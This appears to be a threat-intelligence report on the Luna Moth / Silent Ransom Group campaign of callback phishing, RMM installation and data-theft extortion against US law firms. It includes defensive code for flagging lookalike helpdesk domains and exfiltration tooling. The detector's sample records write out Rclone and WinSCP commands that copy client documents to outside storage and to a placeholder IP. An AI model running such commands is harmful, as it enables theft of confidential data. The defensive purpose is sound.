Full Report
The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks. [...]
Analysis Summary
# Threat Actor: Luna Moth (Also associated with Silent Ransom Group - SRG)
## Attribution & Identity
The FBI tracks this actor as "Luna Moth" and links it to the extortion campaign known as the Silent Ransom Group (SRG); the two names refer to the same group. Its objective is data-theft extortion: it steals documents and threatens to disclose or sell them. No deployment of file-encrypting ransomware is described in the notice.
## Activity Summary
Luna Moth/SRG conducts extortion attacks primarily against US-based law firms and financial services firms. Initial access relies entirely on callback phishing and social engineering rather than on exploiting a software vulnerability:
1. **Domain Impersonation:** Registering typosquatted domains that impersonate the IT helpdesk or support portal of a targeted US law firm or financial services firm.
2. **Malicious Contact:** Sending phishing emails that carry a fake IT helpdesk phone number (rather than a malicious link or attachment) and urge the recipient to call to resolve a non-existent technical issue.
3. **RMM Installation:** When the employee calls, the attacker poses as IT staff and walks them through installing Remote Monitoring & Management (RMM) software from the fraudulent helpdesk website, which hands the attacker an interactive session on the workstation.
4. **Data Exfiltration & Extortion:** With hands-on-keyboard access via the RMM tool, the actor searches for sensitive documents, exfiltrates them, and then sends ransom emails threatening to publish or sell the data. The group reportedly also phones employees to apply pressure during negotiations. Ransom demands have ranged from one to eight million USD.
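Steps 1 and 2 above hinge on a sender domain that looks like the victim's own IT helpdesk. The following is an added example, not code from the FBI notice or from any vendor product, that classifies a sender domain as legitimate, lookalike, or unrelated by stripping helpdesk-style affixes and comparing the remaining brand label against the firm's own domains with an edit-distance check. The legitimate domains, the affix list, the `SENDER_RE` header pattern and the sample From: headers are all constructed for illustration.

```python
"""Flag lookalike "IT helpdesk" domains of the kind used in steps 1 and 2.

Added example; not from the FBI notice or any vendor product. The legitimate
domains, the support tokens and the sample headers below are constructed.
"""
from __future__ import annotations
import re

# Constructed: domains the organisation really owns. A real deployment would
# load these from the mail gateway's accepted-domain list.
LEGIT_DOMAINS = ("examplelaw.com", "examplefinancial.com")

# Constructed: affixes typosquatters bolt onto a brand name to look like IT
# support. Listed longest first so "it-support" is matched before "it".
SUPPORT_TOKENS = ("servicedesk", "it-support", "help-desk", "itsupport",
                  "helpdesk", "support", "portal", "it")
_alt = "|".join(map(re.escape, SUPPORT_TOKENS))
# Strip one or more such tokens from the start or the end of a label.
AFFIX_RE = re.compile(rf"^(?:(?:{_alt})[-_]?)+|(?:[-_]?(?:{_alt}))+$")


def levenshtein(a: str, b: str) -> int:
    """Edit distance; catches one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain: str) -> str:
    """'examplelaw' for 'examplelaw.com'. Assumes a one-label public suffix;
    a real deployment would consult the Public Suffix List."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def brand_core(label: str) -> str:
    """Strip helpdesk-style prefixes/suffixes so that
    'examplelaw-it-helpdesk' is compared as 'examplelaw'."""
    core = AFFIX_RE.sub("", label).strip("-_")
    return core or label  # a label that is nothing but affixes stays as-is


def classify_domain(domain: str) -> tuple[str, str | None]:
    """Return (verdict, legitimate domain it resembles or None).
    Verdicts: 'legit', 'lookalike', 'unrelated'."""
    d = domain.lower().strip(".")
    for legit in LEGIT_DOMAINS:
        if d == legit or d.endswith("." + legit):
            return "legit", legit
    core = brand_core(registrable_label(d))
    for legit in LEGIT_DOMAINS:
        # distance 0 covers "brand + support affix" and "same brand, other TLD";
        # 1 or 2 covers swapped, dropped or doubled characters.
        if levenshtein(core, registrable_label(legit)) <= 2:
            return "lookalike", legit
    return "unrelated", None


# Pulls the domain out of a From: header value such as 'IT Support <help@x.com>'.
SENDER_RE = re.compile(r"<?[^<>\s@]+@([^<>\s@]+)>?$")


def check_sender(header_from: str) -> tuple[str, str, str | None]:
    """Classify the sender domain of one From: header value."""
    m = SENDER_RE.search(header_from.strip())
    if not m:
        return "", "invalid", None
    domain = m.group(1).lower()
    verdict, legit = classify_domain(domain)
    return domain, verdict, legit


# Constructed sample From: headers.
SAMPLE_FROM_HEADERS = [
    "Jane Doe <jane.doe@examplelaw.com>",
    "IT Support <helpdesk@examplelaw-helpdesk.com>",
    "IT Help Desk <it@exanplelaw.com>",
    "Support <support@examplelaw.net>",
    "Vendor <billing@vendor-example.org>",
]

if __name__ == "__main__":
    for header in SAMPLE_FROM_HEADERS:
        print(check_sender(header))
```

The same check applies to the URL host in the email body and to the domain a user is sent to by the "helpdesk" caller; a `lookalike` verdict is a reason to block delivery or to alert the SOC, and a `legit` verdict for a subdomain only holds if the organisation controls its own DNS.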
## Tactics, Techniques & Procedures
- **Initial Access:** Callback phishing: emails impersonating IT support direct the victim to phone a fake helpdesk number.
- **Execution/Persistence:** The victim is talked into installing Remote Monitoring & Management (RMM) software, which gives the actor a persistent interactive session without any exploit or malware dropper.
- **Privilege Escalation/Lateral Movement:** Minimal. The RMM session already runs as the employee who installed it, so the actor works with that user's existing access to documents and shares.
- **Exfiltration:** Data is exfiltrated with WinSCP (Windows Secure Copy) or with a copy of Rclone that has been renamed and placed in an inconspicuous location; both are legitimate file-transfer utilities rather than malware.
- **Impact:** Extortion through threats to publish or sell the stolen data, reinforced by direct pressure calls to employees.
- *Specific MITRE ATT&CK references were not provided in the text snippet.*
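Because the exfiltration tools above are legitimate binaries, detection has to key on how they are run rather than on a malware signature. The following added example, which is not part of the FBI notice and not from any vendor product, scores process-creation records for three things: a renamed Rclone that still carries `rclone.exe` in its PE version resource (Sysmon Event ID 1 records this as `OriginalFileName`), an Rclone-shaped command line (subcommand plus `remote:path` or known flags) even when that resource was stripped, and WinSCP launched non-interactively. The records, file paths, remote names, the `USER_WRITABLE` location list and the 203.0.113.10 address are constructed placeholders.

```python
"""Spot the exfiltration tooling named above (WinSCP, a renamed or hidden
Rclone) in process-creation telemetry.

Added example; not part of the FBI notice and not from any vendor product.
The records are constructed in the shape of Sysmon Event ID 1 fields
(Image, OriginalFileName, CommandLine); paths, remote names and the
203.0.113.10 address are placeholders.
"""
from __future__ import annotations
import re

RCLONE_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto", "lsd", "ls", "lsf", "check"}
RCLONE_FLAGS = {"--config", "--transfers", "--ignore-existing", "--auto-confirm", "--progress",
                "-P", "--bwlimit", "--max-age", "--multi-thread-streams", "--no-check-certificate"}
# rclone addresses storage as "remotename:path". A Windows drive ("C:\") is a single
# letter followed by a backslash and a URL scheme is followed by "//"; both are excluded.
REMOTE_RE = re.compile(r"(?<![\w\\/:])([A-Za-z][A-Za-z0-9_-]+):(?!\\|//)")
# Heuristic (assumption): a transfer tool living where an ordinary user can write,
# instead of under Program Files, matches the "hidden" Rclone the notice describes.
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\users\\public\\", "\\temp\\", "\\downloads\\")


def analyze(event: dict) -> list[str]:
    """Return detection tags for one process-creation record (empty = nothing seen)."""
    tags: list[str] = []
    image = event.get("Image", "")
    exe = image.rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")
    args = [t.strip('"') for t in cmdline.split()][1:]  # drop argv[0]

    # Renaming the file on disk does not touch the PE version resource, so
    # OriginalFileName still reads rclone.exe while the image name does not.
    if original == "rclone.exe" and exe != "rclone.exe":
        tags.append("rclone-renamed-pe-metadata")

    # Command-line fingerprint, for the case where the version resource was stripped too.
    subcmds = [a for a in args if a in RCLONE_SUBCOMMANDS]
    flags = {a.split("=", 1)[0] for a in args} & RCLONE_FLAGS
    remotes = REMOTE_RE.findall(cmdline)
    if subcmds and (flags or remotes):
        tags.append("rclone-cmdline")
        if "rclone" not in exe:
            tags.append("rclone-renamed-binary")

    # WinSCP driven by a script: /script=, /command or a transfer URL on the command line.
    if exe in ("winscp.exe", "winscp.com") or original.startswith("winscp"):
        lowered = cmdline.lower()
        if any(k in lowered for k in ("/script=", "/command", "sftp://", "scp://", "ftp://")):
            tags.append("winscp-scripted-transfer")

    if tags and any(p in image.lower() for p in USER_WRITABLE):
        tags.append("user-writable-path")
    return tags


# Constructed records; none of them comes from a real incident.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},
    {"Image": r"C:\ProgramData\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'"C:\ProgramData\svchost.exe" copy C:\Users\jdoe\Documents\Clients mega:loot '
                    r"--config C:\ProgramData\r.conf --transfers 16 --ignore-existing --auto-confirm"},
    {"Image": r"C:\Program Files (x86)\WinSCP\WinSCP.com", "OriginalFileName": "WinSCP.com",
     "CommandLine": r'WinSCP.com /log=C:\Users\jdoe\AppData\Local\Temp\w.log /command '
                    r'"open sftp://upload:pw@203.0.113.10/" "put C:\Users\jdoe\Documents\Clients\*" "exit"'},
    {"Image": r"C:\Users\Public\update.exe", "OriginalFileName": "",
     "CommandLine": r"update.exe sync C:\Shares\Legal gdrive:2024 -P --transfers 8"},
]


def scan(events: list[dict] = SAMPLE_EVENTS) -> list[tuple[str, list[str]]]:
    """Run analyze() over a batch and pair each image path with its tags."""
    return [(e["Image"], analyze(e)) for e in events]


if __name__ == "__main__":
    for image, tags in scan():
        print(f"{image}: {', '.join(tags) or 'clean'}")
```

Any `rclone-*` tag in a law firm or financial services environment that does not sanction Rclone is worth an alert on its own; `rclone-renamed-binary` combined with `user-writable-path` is the specific pattern described in the notice. Pair this with an inventory of which RMM products are approved, since the same telemetry will also show the RMM installer the victim ran during the call.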
## Targeting
- **Sectors:** Law firms and financial services firms.
- **Geography:** United States.
- **Victims:** No specific victim organizations were named in the notice.
## Tools & Infrastructure
- **Malware families used:** None reported. The actor relies on legitimate software throughout: a commercially available RMM tool for remote access, installed by the victim during the social-engineering call, and WinSCP or a renamed Rclone binary for exfiltration.
- **Infrastructure (C2, domains, IPs):** Typosquatted domains registered to impersonate the targeted firms' IT support portals; the RMM tool provides the remote-control channel, so no separate C2 framework is described. No specific IPs or defanged URLs were provided in the summary text.
## Implications
Luna Moth (SRG) is a significant threat to the legal and financial sectors because its approach is personalized and multi-channel. The phishing email carries only a phone number to call, so it passes standard email filtering, and the actual compromise happens in a one-to-one phone call in which the victim is talked into installing RMM software. Every subsequent step uses legitimate tooling under the victim's own credentials, which leaves little for signature-based controls to catch. The group's success depends on exploiting employees' trust in internal IT support.
## Mitigations
- Enforce strong passwords.
- Enable two-factor authentication (2FA) on all employee accounts.
- Perform regular data backups and verify that they can be restored.
- Conduct mandatory staff training on recognising phishing, with specific emphasis on verifying any unexpected contact from "IT support": call back only on a number published in the internal directory, and never install software at the request of a caller.